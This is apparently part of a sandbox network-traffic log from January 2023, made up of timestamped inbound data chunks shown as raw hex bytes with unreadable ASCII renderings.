e0 e5 f5 b5 a5 f3 f7 c4 f4 4a 3b 80 d9 35 20 85 5a c0 98 52 c8 24 76 e9 25 ab b0 be bb 7f 72 d1 cd fd f7 ef df 87 09 d9 9b b8 82 af af 0d 3b fe 91 33 33 d3 4b 30 30 14 b8 44 02 ca 5f Data Ascii: ~n,#:Ev0B2&:tZw}dlqK;\|Ha'7k< b!G4sN~H+jA!hB#bN)do?8FotuuuwwA%bvxxtzvFgpssC-d:g~J;5 ZR$v%r;33K00D_
2023-01-03 15:29:20 UTC	1329	IN	Data Raw: 56 04 ee b6 06 f4 02 f0 2b ea f6 12 c0 91 f4 3a 63 6d 7d 0f 97 1a 40 bb ad 41 ba 03 b2 23 39 32 20 7b 8a f3 ef 93 8a 10 53 e5 5b a3 2e 23 80 a3 3f 66 66 12 b7 93 2a 3b 07 e0 32 bf a8 ce 4a 39 b4 95 e1 fb d3 06 a0 09 43 ca 68 ca db c3 e2 d4 7c 25 ed fa aa 85 e1 f4 df a4 f7 e3 21 df 88 e3 80 30 bb 44 c9 dc cd 54 36 cb b3 be 0d 64 16 f2 c7 ee 66 f1 7b 4e 0b 30 78 19 f0 ec 03 dc c7 19 6d bf df 81 8b 35 57 85 27 6d c2 b3 28 97 b9 8b 36 18 fa 47 1d 33 10 2d fa 0d b8 e8 2a 60 77 81 ca b2 e1 9f fa 4f 3e 1a f1 0c 96 24 c6 1f 93 29 7f 51 cd 7a 22 d0 42 49 36 4b 84 ba cd fd aa ed 18 d6 ac 13 33 f1 be 38 94 e1 f9 ff 23 08 17 24 24 8c b0 0b 15 9b f5 10 94 29 8e 8c 04 85 71 1d e7 34 5d ac 94 3b 64 65 fa 40 f6 e6 a7 76 88 f2 6f 95 c7 cb c3 9c 2a c0 b8 6e 31 5f 18 62 b3 Data Ascii: V+:cm}@A#92 {S[.#?ff;2J9Ch\|%!0DT6df{N0xm5W'm(6G3-`wO>$)Qz"BI6K38#$$)q4];de@vo*n1_b
2023-01-03 15:29:20 UTC	1345	IN	Data Raw: 81 32 c4 44 1a b3 c6 e7 7a 4d 45 9b c8 1c c4 1f 3c 7e 0f 98 41 f4 a7 98 fd f3 a7 9d 46 8e 96 b9 93 a2 17 4e c9 51 7a 67 74 36 ce 2d a6 24 61 d0 b3 79 6a 46 4c 7b 2d 67 4f 07 4b 22 8d f8 ae c6 0c 7a 2b ba 0f f9 06 5f 10 a9 ba 42 ae 7f b4 2e 23 73 c3 90 e3 c6 46 e8 a4 8d 00 fa ac fd 9e 17 ed 08 8e 66 e6 12 5f e8 c9 50 28 d1 97 91 10 03 2c 92 37 f7 af 42 84 41 43 3b c2 2f ea 8c 85 7d dc e3 37 40 09 36 b5 e0 be e9 db c8 f7 56 35 cb 03 d2 b7 63 af bc 90 95 55 cc 05 ca 6f b7 12 40 1a 38 9c 1b 87 dd 49 84 d7 f1 ef 14 62 82 52 33 0c 04 8e 53 87 71 ec 28 c4 e8 b5 86 36 74 a4 fd ce b2 7b b1 bc 04 38 3f b8 08 fc f4 76 8d 12 ca 75 9d 1d 53 2f b8 16 fb 33 16 8e 97 df 7e 6f 28 e9 25 7f 19 21 1c 1f b3 bd 8d 46 14 45 26 68 8c c0 60 0c 6b e4 24 09 46 63 69 c4 1e ca cc 94 Data Ascii: 2DzME<~AFNQzgt6-$ayjFL{-gOK"z+_B.#sFf_P(,7BAC;/}7@6V5cUo@8IbR3Sq(6t{8?vuS/3~o(%!FE&h`k$Fci
2023-01-03 15:29:20 UTC	1346	IN	Data Raw: d9 ae cb 94 4e d4 46 31 0d cd 8f ef f6 5b 04 92 b1 e5 61 75 59 22 84 7d e6 10 02 57 a2 68 84 d2 13 b7 5f b1 73 23 3c 25 e1 d2 b4 83 a9 60 39 e7 10 cf 2b c3 3c b0 95 af 02 8a 1f a9 4f 19 e2 bb 52 9c af 7b 97 b4 9d 49 7d d2 e8 48 69 76 6e ca 29 aa 35 f0 7b c7 34 7a ea 46 fc 6f 93 be 75 b9 47 bf 99 af 47 f2 4c cd 61 f9 ee 39 d7 e7 c9 3d ee fa f0 95 cf 53 06 40 5c 03 e6 ab 15 ca af d0 20 23 c9 72 b6 ec a0 88 ae e5 ab a5 17 8f 91 e1 a4 4d 8c 55 ce 1f 88 b0 b1 bd 24 33 fa 0d 99 dd 61 cc 9b ed 29 52 f9 7d b9 2a b8 3c 78 0f 66 b7 7b 05 2f fb 1f f6 e9 05 fb e6 47 dc 89 a0 5f d2 72 e4 86 b9 6b b5 9d ff ed 4c 15 0d e7 49 ff 5d c2 17 a5 1d 86 41 aa c8 b1 e8 1e 5c 67 68 5a d7 17 ab 14 6a b2 90 c8 32 f8 34 21 14 c6 ea 9d ed 57 b0 0e 6c 3a a7 d4 f6 10 ce 70 e7 68 9f 90 Data Ascii: NF1[auY"}Wh_s#<%`9+<OR{I}Hivn)5{4zFouGGLa9=S@\ #rMU$3a)R}*<xf{/G_rkLI]A\ghZj24!Wl:ph
2023-01-03 15:29:20 UTC	1362	IN	Data Raw: 5d 27 1d cd f4 77 48 ec 20 84 36 06 8c 12 75 51 e7 77 5a 4d 5e ea b7 51 8d 35 f7 a6 b1 ab 01 e3 92 87 e5 8e 52 99 93 7c 02 2b 2f 1e 8d e5 a6 70 06 eb 3f fc 31 c3 f3 a9 d3 db 45 df 2e ba 49 f5 fd ed ee 7e c1 17 de ef 01 8c 9a 8e 57 a6 22 03 33 ff 65 52 f3 bf 6e 91 d7 e1 5f 10 5e 9e 9d 10 2c 27 66 d6 4b 4a 36 8b c9 e1 ef 1b 34 7d 8d 29 f1 23 d2 15 c8 4f 2b 30 9d 94 f5 36 bf 73 4b 90 83 87 49 c9 2e fe 22 f7 c3 d4 23 fa 42 99 ec 78 03 71 c6 0d a5 5d fb a7 c7 9d aa a9 59 e8 cb 46 7b df fd 4a a8 f2 d6 d3 ad e7 4e 4f f2 9b 43 98 17 6d 7f f4 ec 17 37 4a a0 b2 5b 82 ba 94 f2 61 b3 7a ed cd f1 4f a5 7d 9e 66 bd 09 49 8a 86 95 af 8a 6a 2b 52 1f ad 40 21 9f ab 90 a4 4e 48 2c 5f c9 f4 f8 96 25 96 bc 44 21 82 3d b7 5e 73 1e b6 17 95 85 89 bf 71 07 83 6f eb 3f 7f a2 9f Data Ascii: ]'wH 6uQwZM^Q5R\|+/p?1E.I~W"3eRn_^,'fKJ64})#O+06sKI."#Bxq]YF{JNOCm7J[azO}fIj+R@!NH,_%D!=^sqo?
2023-01-03 15:29:20 UTC	1363	IN	Data Raw: 33 51 14 d2 f5 79 9d ad e6 25 03 1f 3f 1b ef a2 c0 b1 52 79 12 4d 78 62 74 f8 1a de 79 18 28 cc e4 38 f0 ef b7 65 00 a2 82 9b e6 6e 9b a0 60 3f a7 30 7b c8 42 9a 6e c1 80 62 17 1a 93 d7 6b f6 3d 86 83 3e 9f 5d 9a 51 f3 e8 a2 15 2a 35 52 3c d8 a5 ff 55 07 54 f9 2d fd 21 9d a6 5e 38 30 91 d1 af af b6 f7 72 b2 0a e2 87 3b f4 d6 7b fc dc 1d 70 7a 4a fb 96 ef b8 b1 f6 57 72 5a 0c 7f ce 63 08 58 b9 02 7e 1c 2a 69 6f ec e9 49 2a a1 2f 02 36 4c fa 38 aa 28 b7 2a ff dd d6 48 63 51 ab 38 3f 44 b9 7a 1f 84 ef 9e 8e ae ad 66 03 2a 33 6a 86 54 73 6e 54 54 66 d0 67 1e 21 d9 bc 58 30 97 7c 66 61 29 2f 77 46 61 10 d6 5f 1d db 7a 92 36 72 e2 13 f2 ee 11 01 c5 46 6a 1a b2 7b 4b 7b 1f cd 44 94 7e a8 d8 1b 0d 80 08 72 be f4 7f 3b 7d d8 14 07 2f 9e f8 c6 9d bd 25 37 9d 47 81 Data Ascii: 3Qy%?RyMxbty(8en`?0{Bnbk=>]Q5R<UT-!^80r;{pzJWrZcX~ioI/6L8(HcQ8?Dzf*3jTsnTTfg!X0\|fa)/wFa_z6rFj{K{D~r;}/%7G
2023-01-03 15:29:20 UTC	1379	IN	Data Raw: 23 07 69 f8 f4 3b 16 ea 8b 0b 8d 25 e8 5a 1c 69 20 63 cc f4 00 1a 7e 0e 9d b2 ae d8 5e 68 0a df fb ab 0c 6f 70 04 f5 ad 01 36 05 f2 bd 84 3f 18 59 c4 cc 4c 6a b1 f6 f8 d5 17 d3 e5 3b c0 a5 e5 44 20 2d 1e 4f b5 5f 5a 68 40 09 47 84 26 16 3b 2f 53 b6 8a a8 ea 9c 1a 13 4d b6 f4 58 36 fd de 72 b6 b3 af 6e 53 38 e3 dd a4 31 af 4b 84 e9 e0 cd fd 12 24 2c 27 d2 ab f6 bd df 78 28 35 f3 df ee 95 57 66 40 bf 67 1d 5e 8b cb 7b 50 14 0e 65 4c 40 34 fd c2 97 7b 56 3d d5 13 18 18 85 0a 87 cf c9 38 34 b9 ed 47 6b a6 23 a9 fb f6 70 8e e1 b4 c1 af 2b bd bf 62 0d 51 3d 4a 09 84 82 61 49 8c 3e 17 8b 1d 0d 13 94 df 5c e6 97 ac 8d cd e9 d0 d3 ff cb 75 66 3e dd e6 f3 43 28 3b ad 2e a1 e5 71 d1 a8 ae 3d 08 07 f2 41 d1 bf 32 57 f1 6b d0 d3 9c aa fc 56 d6 a1 bb aa a1 d8 f4 a2 34 Data Ascii: #i;%Zi c~^hop6?YLj;D -O_Zh@G&;/SMX6rnS81K$,'x(5Wf@g^{PeL@4{V=84Gk#p+bQ=JaI>\uf>C(;.q=A2WkV4
2023-01-03 15:29:20 UTC	1380	IN	Data Raw: 3c 1e 45 ce 9b 84 2c b1 16 5a f0 5c 22 7b 92 01 9a 81 8e 17 98 b3 20 a1 6a 99 22 1a 5f 56 6d 93 03 72 de 3e c3 0f 24 a4 3e ae 38 b0 81 5f eb 01 50 3a 77 09 44 2a f7 4a 48 7f f6 2f 95 ef f4 3f 6e 9d 21 b9 50 6d 8e 35 a9 83 f1 8e 2e bd 98 63 c8 ad 11 c3 97 7f 41 a6 18 29 0b 07 3f ba 4e 5d 1a a9 28 50 07 90 c7 45 6c d3 42 43 56 52 21 fd ac 5b ad 0f 66 03 72 14 b4 a1 24 09 82 d0 e1 89 22 50 41 9a 0b 87 24 1f c9 f3 29 9b a1 01 5b 25 ab a4 d2 f0 b0 3d aa a6 08 3a 70 17 16 dd 7e d6 91 08 16 d6 f0 04 eb 43 13 03 21 82 33 4f 46 59 44 46 54 0f 0b bd f0 22 d6 38 0b 0f 15 1d 51 41 74 24 20 4a 41 25 27 ae 14 3a bb 61 eb 28 b6 27 09 1a 1c cf 47 1b ae 04 42 72 42 d3 86 94 34 94 32 9c a8 0e 66 03 d6 ef c6 22 da b1 ec 2b 40 1f 0b 04 17 1d 51 95 0d 5f 01 85 96 81 9a 54 ec Data Ascii: <E,Z\"{ j"_Vmr>$>8_P:wD*JH/?n!Pm5.cA)?N](PElBCVR![fr$"PA$)[%=:p~C!3OFYDFT"8QAt$ JA%':a('GBrB42f"+@Q_T
2023-01-03 15:29:20 UTC	1396	IN	Data Raw: 73 cd 12 75 f8 e7 05 26 68 d0 5f 6b 6f 07 6e ff b5 b6 07 21 e7 5f 6d e0 43 fe 75 84 00 88 ff 6d d3 2c 55 6f 02 c1 e4 fc ea aa d6 0f ad d5 7a e5 52 78 7c 4f 08 00 20 b7 f3 58 89 46 22 f8 4b 39 80 fb 5c e5 a0 5d 01 7d cf 50 bb e7 c7 2d cb 97 79 84 f9 86 15 84 99 73 05 3e 9b b9 ef ac b6 53 22 3f 2e d2 de 6b 0b d7 72 bc 28 a5 15 a6 a9 ed 32 be ee 7d 77 59 53 46 98 d1 9d 9e c8 47 ab 50 73 df c8 e5 6a 4e c7 c6 81 56 a1 44 2d b5 2c e6 5b 94 9a b0 b5 d3 21 b9 d3 a8 48 5f 21 e5 b7 b3 c9 ce 58 bf 10 6c d3 ea 56 2b 60 18 a2 3f 82 3c c1 c1 5d d3 da 33 0e bb 8d 2b e8 0b a0 2b fd d3 92 55 c6 e8 41 41 cd 7a 5f d8 e7 c8 33 54 b6 16 af 47 36 9c df 20 e2 f8 7a 24 fe 72 52 ca 67 f1 51 92 13 3e b1 48 8f 49 bc 21 a5 1b 27 55 8f 9b c5 dc bb 0c 98 25 23 6f 7c 98 41 eb ad a3 85 Data Ascii: su&h_kon!_mCum,UozRx\|O XF"K9\]}P-ys>S"?.kr(2}wYSFGPsjNVD-,[!H_!XlV+`?<]3++UAAz_3TG6 z$rRgQ>HI!'U%#o\|A
2023-01-03 15:29:20 UTC	1397	IN	Data Raw: 4f fc bd 86 33 e1 a1 e5 0e f4 e5 a0 e5 dd a2 77 4e cc 51 2f b5 37 ab d6 b1 56 ba da 8f 99 22 3a 3a 62 64 21 91 57 b7 ba b0 f3 8c 7d dd 8d 0c 45 72 85 db cb 49 ee 99 24 b7 f2 a3 29 77 2b e5 f7 38 12 6e 48 00 7e ec ef 07 55 3d da a5 f1 e9 85 2f 35 97 fb 95 c6 cd 9d 84 be fd 39 c5 9a a3 69 ea 7d 8c 19 6a ec 1d 3d 72 b9 6d c0 33 5d 3b ce 20 1c 4c d1 a8 a4 90 91 19 29 a8 b1 f7 97 63 37 3b 02 0e 28 ee ea fd f6 61 5f 34 cb a1 2b 5c b2 e5 cb b6 c1 ee 8d ae fb b2 5d e5 32 c4 a7 7c cc 91 1a 53 02 17 7a 2e 0d 27 61 23 17 d2 ef 67 09 ee 4c e2 7b fb e4 d7 b0 af 09 62 39 7c 1b aa 18 c7 02 5f 60 9f 55 cb 70 be c9 fb 23 3b e7 11 fb 3e c7 87 d9 d7 56 65 8b be d5 e9 77 62 ba 08 81 cc 01 86 7a ba 93 5f 7b e2 5a f6 99 1d 33 e7 d1 01 05 0a 10 3b 11 09 22 2e cb 9a c3 fe 79 a7 Data Ascii: O3wNQ/7V"::bd!W}ErI$)w+8nH~U=/59i}j=rm3]; L)c7;(a_4+\]2\|Sz.'a#gL{b9\|_`Up#;>Vewbz_{Z3;".y
2023-01-03 15:29:20 UTC	1413	IN	Data Raw: 72 44 39 83 2d 85 2e cc 10 e6 c6 45 a1 1b 5b 96 39 69 dd 95 15 78 9d 05 24 34 e4 cc 1a a6 44 63 37 95 cd 49 5d 04 ef a5 c2 5f 2f e0 58 d9 60 10 d9 32 ed 21 ad 6f 4a 85 cc ea dc 53 cb 1a f6 2b 7e 82 64 79 c2 db 07 59 20 ae cb 9c 57 81 15 77 2a 88 00 44 42 6c b0 61 fd 8e 2a 25 c8 fc bb 0e a1 61 dc 9e f4 57 4a 10 dc 9d 46 9f 22 d5 14 54 97 07 55 cf 91 8f 25 f9 55 24 dc bc 12 83 fb 63 96 61 60 fe 84 13 9c d9 02 5e e5 35 e0 3c 8e e2 a9 22 9d d2 56 2c d7 5e e6 b3 a1 dc 84 11 de 9c 18 7b 72 79 bd bf 17 e4 fb 75 5d 21 f8 fc 81 c8 5e 60 09 cf 05 83 6b c1 91 f7 88 84 e3 d3 76 2a 1b 12 14 6b d9 cf df 2f 82 b4 d9 f1 f3 ad 68 bb a6 cc da c0 9a a6 4c f5 14 0d b3 d4 d0 b2 7f 34 b0 2d 04 db 93 94 da 0d 63 11 84 f1 52 e4 83 b2 ec bb ae 53 6f 0c a8 9b d3 9a a6 45 30 79 a8 Data Ascii: rD9-.E[9ix$4Dc7I]_/X`2!oJS+~dyY WwDBla%aWJF"TU%U$ca`^5<"V,^{ryu]!^`kv*k/hL4-cRSoE0y
2023-01-03 15:29:20 UTC	1414	IN	Data Raw: ef 28 0e 83 1d 83 56 b6 89 95 d5 2c c5 17 f8 07 39 85 dd 77 97 82 e4 15 cd f8 6f aa 58 2a cd a2 7e 48 dc 52 f6 54 8f 30 7e 41 d2 e0 20 8e 7a 5e bf 56 ca 6e d3 be 0b 68 c5 28 48 d0 0f a9 ee 67 ea d8 ed da 5e 3f 68 77 38 ed f7 63 b7 33 b9 11 78 cc c4 18 fd 28 35 32 97 8b 5c c8 3c c7 54 1d 05 f6 24 08 b5 4f 68 9a 3e 29 4a de 8d c8 71 a2 bc 8f 6d 91 42 6a 90 1a 44 1b 27 b3 8c 25 d5 ae 57 d1 2a 94 4e bc 9d 62 0e 65 b3 be 55 ff 11 5a 16 49 fe c6 8f d4 73 5b 2a 89 c7 f9 b3 dd 40 b8 e6 5a a2 c8 5a 4f b5 64 5d ea 89 41 d5 3b 4b 2a e8 9a d4 17 ac 95 65 9e e8 4a 1a 63 9c 61 89 02 70 8c 12 3e 71 00 fd 50 03 fe b5 3e e7 bb 71 49 bd 50 1c 09 7d df db 9c 8a bf 55 ac a2 7f fc ae 34 d0 5a 3f ec 4b 00 03 f3 72 90 d7 b2 44 70 0c fb 0a 75 58 f6 7b d5 12 ed 1f b4 63 33 ee 49 Data Ascii: (V,9woX~HRT0~A z^Vnh(Hg^?hw8c3x(52\<T$Oh>)JqmBjD'%WNbeUZIs[@ZZOd]A;KeJcap>qP>qIP}U4Z?KrDpuX{c3I
2023-01-03 15:29:20 UTC	1430	IN	Data Raw: 6a bf ac 66 67 7c d0 f1 8b 5a e2 75 9b a9 e3 ae 1a f7 ee 35 15 f7 91 40 16 20 7c ee e1 e8 63 cd b7 dd 84 8b 93 c4 b7 aa 37 a3 f6 c9 57 6b 29 1c 4e 53 f4 aa ba 5a 39 af 2a 8b c1 42 08 bd 7e 18 9f 4c 11 c5 ab 51 b8 0d fd 23 2d 91 e1 62 6b 3d 67 18 b1 b8 e4 a0 4b 30 0f 36 f8 fa a3 57 95 7d d9 52 97 57 f5 39 32 5f 5e 9d af a9 6a 77 9e c6 75 9e 4b 82 6d 36 13 02 79 dc 83 9e 6b ef 98 e7 7e 6d cc d2 7c 77 8e 68 a2 71 d8 cb 51 d5 fa 73 90 e0 25 92 20 bf 21 18 5b e5 fe 64 90 a4 62 b7 2c 82 7a c8 3d 88 38 e3 e2 5d 9a 7a 9d 2b 0e af eb 0d e6 45 5b b4 1a 87 39 8c d0 1d 51 f6 85 31 2c cf 94 2e 96 a5 0a 1d 75 0f 10 df f3 ba b8 a8 28 8b 7d 13 4b 55 25 8f ee 0b c1 f3 67 cf 3a 29 a8 ed 6a 62 1e d4 d0 f2 a4 49 98 b4 45 ce 97 81 12 cb f4 b5 f3 e0 63 8e 43 21 65 51 a0 35 c2 Data Ascii: jfg\|Zu5@ \|c7Wk)NSZ9*B~LQ#-bk=gK06W}RW92_^jwuKm6yk~m\|whqQs% ![db,z=8]z+E[9Q1,.u(}KU%g:)jbIEcC!eQ5
2023-01-03 15:29:20 UTC	1431	IN	Data Raw: dd 1c 5e 73 6c 25 f5 d6 98 43 89 61 9e 1d ce 88 0a 4b 5d af 75 3d 18 2b 7d e8 aa 57 04 a8 e0 74 5c 3f 2b 0f 68 35 c1 df 81 5a 0c c7 c4 2c 18 6f 23 a1 af e9 b9 d7 54 97 64 1e f2 4a 10 d2 ad 09 21 76 bd b1 d3 ce 7f 99 60 6c e3 3b 17 9c ce 64 9b bb 5b bd 94 49 9d 91 2e a7 92 3f 98 cf 1e 47 cb 18 66 63 c7 f1 74 ff 52 8f 82 81 5d 69 e1 8a 8f 94 4c 96 ea 4e ba 5f 5b 8d e5 f4 73 8b af 4d 1d 48 bd c1 5d fb 8e bc a1 73 9e c9 2c c6 af cb 60 7b 96 f8 b0 1d 1a 98 15 82 fb 62 0c de e5 e8 54 ef ab 8d ab f5 9e 19 72 44 35 e7 b4 13 7b 8f 01 78 f8 c6 8b b2 b6 4a 22 5b 8b 7a 9f a6 be f4 56 9d 36 6f d3 e7 59 8b dc 5b e3 d6 a6 bf d0 bc 3c da 87 06 85 b8 92 e2 f2 eb 80 28 15 cc ff 68 ce a3 52 4f c6 2d 4d 7f 6e b9 80 d7 68 5d 2c 1e f9 c3 12 5f 95 c8 18 a7 40 53 b0 38 9d 1c 37 Data Ascii: ^sl%CaK]u=+}Wt\?+h5Z,o#TdJ!v`l;d[I.?GfctR]iLN_[sMH]s,`{bTrD5{xJ"[zV6oY[<(hRO-Mnh],_@S87
2023-01-03 15:29:20 UTC	1447	IN	Data Raw: 25 f0 84 5c 28 39 6b d7 1e d3 77 16 2f b8 3c 7c cf bf 34 ed 14 66 8c 99 d1 12 4b 66 34 99 e2 13 5f 5e 7d 6e 32 ef 96 d2 a9 58 d5 d7 7d 86 02 9f c2 9f a6 b4 b3 2e f7 18 7a 46 53 b8 a0 c0 5f 86 93 b7 30 21 3d d6 e8 87 45 84 6e db 25 f6 78 2e 6e 9b cc 41 79 5d 0b 23 23 7f a6 34 a3 a9 be 46 a7 ad 08 85 2c 68 b3 71 05 ff a8 c7 88 89 e8 16 b6 26 5a b6 2a 09 4f 9c 06 17 53 5d ee f3 0d ff b1 ad f1 27 05 6d c4 2d ef e1 4c e1 fd 30 95 79 d6 48 28 39 02 95 23 91 ce 68 b4 01 84 37 ad 3a 25 03 eb 63 5d 0e 41 99 ec a4 0d 21 3e 27 63 f7 2a 3e ca f7 0e 3a f5 ce fe fc a9 a7 3b 7e dc db 78 e5 0f 60 1b ef 63 92 26 a3 39 ff 33 a7 c9 d0 93 17 8a 9e 66 cd b1 cf 78 44 26 57 d1 df 48 77 d3 a0 c9 76 56 ec a3 80 d1 e7 b4 cb 21 25 de db 70 72 a7 c5 14 ca ed f3 a6 c2 e8 c7 9d f6 fa Data Ascii: %\(9kw/<\|4fKf4_^}n2X}.zFS_0!=En%x.nAy]##4F,hq&ZOS]'m-L0yH(9#h7:%c]A!>'c>:;~x`c&93fxD&WHwvV!%pr
2023-01-03 15:29:20 UTC	1448	IN	Data Raw: ba a2 2f 54 5e 7d f9 28 b0 2b eb 34 1d 1d 5a d8 d8 2a ed b7 7a 26 af 38 16 92 d7 a8 f2 1c 5a c9 4e 8d 03 f0 24 b4 d2 ab 66 be 71 cc 89 ce 80 fb 3d 7f c7 81 b2 3d c5 89 91 26 41 8f c4 5f 8f 82 55 27 12 bc ae 1b be 63 02 fd dd aa 29 28 0e 2d d9 84 ba a7 40 ac 86 ab b8 f7 65 9e 95 28 65 93 ba 0f 5f d8 3f e6 25 ef 02 73 e8 64 61 c9 1e dc a3 b9 93 1d f2 c2 5e 41 8b 73 77 44 e1 9e 8f 0c 0e c5 f1 b6 c3 0e 2b ab ba b8 e9 e2 ba ba dc 49 7f f8 d2 ca 38 44 92 5d 43 12 a6 c3 d8 60 b0 91 c4 9d af 14 19 19 5e eb 69 ab 83 a8 43 39 a3 ec e8 b9 16 84 24 1f 16 fe 31 51 dc df c8 d3 2c 65 36 57 3e ca b0 6b 89 dd 40 cb 19 a0 cf 77 68 ec b8 3f 5d 53 0c 0a 44 e8 68 8e d7 33 f7 5b c5 5b d3 d8 cd 8b e7 3c 71 10 42 2e e5 c3 03 5a fb 2d 9e 9e 19 74 c8 d2 7c 82 88 c1 2f 7d a4 7c 0d Data Ascii: /T^}(+4Z*z&8ZN$fq==&A_U'c)(-@e(e_?%sda^AswD+I8D]C`^iC9$1Q,e6W>k@wh?]SDh3[[<qB.Z-t\|/}\|
2023-01-03 15:29:20 UTC	1464	IN	Data Raw: 42 28 a1 15 b4 eb 9c 08 af 7e 08 93 dd ca 3b 11 eb f1 fa dc 35 90 67 c6 fc 67 51 d9 8c 60 aa 73 75 e3 f1 e5 b1 e9 32 93 a1 48 1a f6 ff 41 ab fc 45 5c ff 83 ab fc 5c 72 ff 2b 53 b7 a1 ea f4 24 2c 6d 84 f1 ff 47 dd 5f 40 45 19 fd ff bf e8 0c dd 2d 1d d2 21 29 dd 48 2b 48 37 d2 88 80 20 9d 4a 08 48 0a 08 a8 74 49 a9 48 49 89 94 74 29 dd 08 48 77 77 9f 99 79 66 f8 fe be f7 fc ef bd ff b5 ce b9 77 ad e3 5a f8 da fb fd ec f8 ec fa ec bd 9f 61 f4 2e 7d d2 1d 24 70 33 ad d0 38 8e 53 6a f4 c9 4c fb 38 8b 90 d0 3f 4c c3 77 e9 ef ea 6d 15 53 27 84 d6 94 95 26 05 1c 91 ec 52 79 1c 13 58 fe 70 d3 bf 43 69 de 7f ff d4 d1 47 fd aa f1 20 e3 70 b1 70 85 d5 f0 23 05 7d 4d e3 b1 bc fa 4e b1 5b 6f fd ce 55 4d 3c a7 0f 8d 88 33 e8 ef 0f 97 85 f6 68 aa 6a 7f e2 b6 01 cb b2 c0 Data Ascii: B(~;5ggQ`su2HAE\\r+S$,mG_@E-!)H+H7 JHtIHIt)HwwyfwZa.}$p38SjL8?LwmS'&RyXpCiG pp#}MN[oUM<3hj
2023-01-03 15:29:20 UTC	1465	IN	Data Raw: 44 72 cb 61 88 55 5a ac 0e be f9 d4 41 fe f6 85 1c 48 0c e7 5a 8f 9f 5b 29 51 94 80 eb fc 8e ad 10 46 ec eb 51 25 13 de 94 a3 a6 e3 0e 3d 3f 72 a3 e8 6c 5b e1 c1 9c 88 de a9 f5 4a cd 80 f4 3f 0f 2c a5 69 58 a4 dd 29 8b 46 15 ae 3c 34 6b b9 4d 44 0c 51 ce 08 42 b7 3f ea da d2 9b 4d 1a 5b 29 3b 58 59 0c 3b 28 5d 45 6c 68 96 5d 19 f1 a1 71 c7 40 67 8e 4b 3b 41 ab a6 f7 43 dd 53 01 7b c1 aa 3b 3e 72 26 c6 aa 48 8a b5 d5 29 0a b6 23 bd 21 5f 66 a8 ea 43 bf ac 8e 9a 44 f7 e6 7f 59 1d 54 7d 10 eb 79 df d7 3d 41 b9 b4 4e 61 a3 3f 9a 95 af 16 cb 71 f2 e1 a7 ca d5 62 d9 28 4f 8e 94 ca 21 8b d1 de d7 9a b5 ef e4 1d f8 22 8a 79 54 7d e9 04 a8 56 e2 0d 7a 65 f8 8f 26 be 35 46 b6 c6 9f 0b 98 05 7b 5e 79 57 50 b5 7f 92 93 0e 75 e0 fc 59 b9 30 50 94 fc 76 3b ff 79 ff 88 Data Ascii: DraUZAHZ[)QFQ%=?rl[J?,iX)F<4kMDQB?M[);XY;(]Elh]q@gK;ACS{;>r&H)#!_fCDYT}y=ANa?qb(O!"yT}Vze&5F{^yWPuY0Pv;y
2023-01-03 15:29:20 UTC	1481	IN	Data Raw: 03 f8 f8 07 81 f4 67 d5 0a 63 bb 25 3f 9b ca f1 83 d3 78 13 c2 3c d2 9d 5e 1c 98 1f 48 24 6d de 7f 2b 82 4f 98 d0 1e 32 81 cf 7e 01 b6 63 bc 1b 5d 48 5d 38 d3 2b 17 59 ac dd 74 76 38 d6 ed 43 f7 24 ad d1 51 fd 5e 66 9a f7 f2 cf b1 eb 90 ac 7d 42 d1 9f a4 43 78 e7 3f fd 36 df 05 c6 ec 60 10 6a 65 bc 92 dd ca 1e a2 18 d0 34 f1 89 4f 12 10 42 da 22 e9 6f b0 a8 ea 7c ee 26 9f d5 f0 e0 08 5f 45 0e e3 73 4e 26 f7 83 90 d5 ca 2f 59 ee 32 5b 6a e1 97 bd 71 1f 5d df ad 7c 0e d5 b9 67 ee f6 0d c7 be 70 a1 ff 34 9d ea df 1f b3 92 60 62 bf 69 09 e4 3b 8a ea 96 48 4c 82 46 5f 1f e4 7a fa 92 48 39 3d 0f 3b c9 f0 41 3b be 5a 17 de 9d e1 a1 0b 13 a6 bb c6 1f bf 6e 09 33 df 98 7e 6e 7e 51 8f df bc 71 22 1d 32 e6 8f 26 4e 17 80 e4 79 73 ce 3e 5e 3d 47 71 7a c8 d3 d7 d2 f5 Data Ascii: gc%?x<^H$m+O2~c]H]8+Ytv8C$Q^f}BCx?6`je4OB"o\|&_EsN&/Y2[jq]\|gp4`bi;HLF_zH9=;A;Zn3~n~Qq"2&Nys>^=Gqz
2023-01-03 15:29:20 UTC	1482	IN	Data Raw: fe b3 99 09 54 e7 47 2f 63 53 38 ee 58 c4 36 ed 56 f9 93 ff 58 c1 b3 fd 9d 7b 7a 60 58 71 ad 19 b7 58 93 fa 8e 11 fa 22 81 87 95 21 21 67 92 29 4d 88 b6 11 f3 a7 65 e8 e7 77 1a 5f df 1d de c7 64 22 39 3c b4 b4 b3 35 f1 46 4d 5b dd 18 0b 11 40 65 74 7a 11 56 fc bc e4 e9 be d6 4c 32 65 b7 f5 77 46 57 b9 a0 df f1 66 a5 ef 56 6c b1 4b d4 87 ad bb 51 8c 22 4c ef 6e bd 0b 3e 1b 6a 4d 15 63 d8 7a fe f1 57 18 d5 35 8a d5 4b fc 4f cb 8f 02 66 b2 c2 50 8e a8 6e dc e9 ea ce 56 73 4a 29 24 f5 8d 0a ba 68 1d 90 ea 95 86 0b ad 8e db 94 63 9e 0f 77 c4 a0 42 ef 57 5a e1 aa 31 9b ae d9 38 5c b5 14 3f 7b e2 b2 38 0a bd d9 95 9e dd f1 f5 d5 b5 ef a0 48 51 1d 0a d8 c0 4a 3a 77 2e 79 14 dc b0 d0 c1 73 45 43 d9 79 4f e5 73 74 03 ae 28 87 96 76 b9 62 bd 3c b9 02 0e 3b 25 be 36 Data Ascii: TG/cS8X6VX{z`XqX"!!g)Mew_d"9<5FM[@etzVL2ewFWfVlKQ"Ln>jMczW5KOfPnVsJ)$hcwBWZ18\?{8HQJ:w.ysECyOst(vb<;%6
